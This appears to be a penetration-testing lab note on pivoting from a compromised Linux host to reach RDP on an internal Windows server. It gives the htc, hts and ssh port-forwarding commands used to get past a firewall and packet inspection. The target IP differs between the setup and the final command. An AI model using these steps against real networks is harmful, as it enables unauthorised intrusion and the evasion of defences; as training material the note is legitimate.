Scenario
Goal
RDP over HTTP from Kali to Windows Server in internal network using
HTTPTunnel
.
What we already have or know:
- A fully compromised Linux machine connected to internal network
- The Linux shell is HTTP-based (port 443)
- The firewall only allows inbound traffic on port 80, 443, 1234
- No service is actively listening on port 1234 on the Linux machine
- Hosts
- Kali (attacker machine)
- Linux (compromised server): 10.11.0.123
- Windows (target in the internal network): 192.168.1.11
Execution
- Establish a HTTP-based Tunnel from Kali 8080 to Linux 1234 (bypass DPI)
- On Kali:
htc --forward-port 8080 10.11.0.123:1234
--forward-port
here specifies the listener on Kali
- On Kali:
- Decapsulate HTTP Tunnel traffic from Linux 1234 and output to Linux 8888 (RDP doesn’t understand HTTP tunneling)
- On Linux:
hts --forward-port localhost:8888 1234
--forward-port
here specifies where the decapsulated traffic will be forwarded to
- On Linux:
- Establish an SSH local port forward from Linux 8888 to Windows 3389 (RDP)
- On Linux:
ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -NfL 0.0.0.0:8888:192.168.1.110:3389 user@localhost
- On Linux: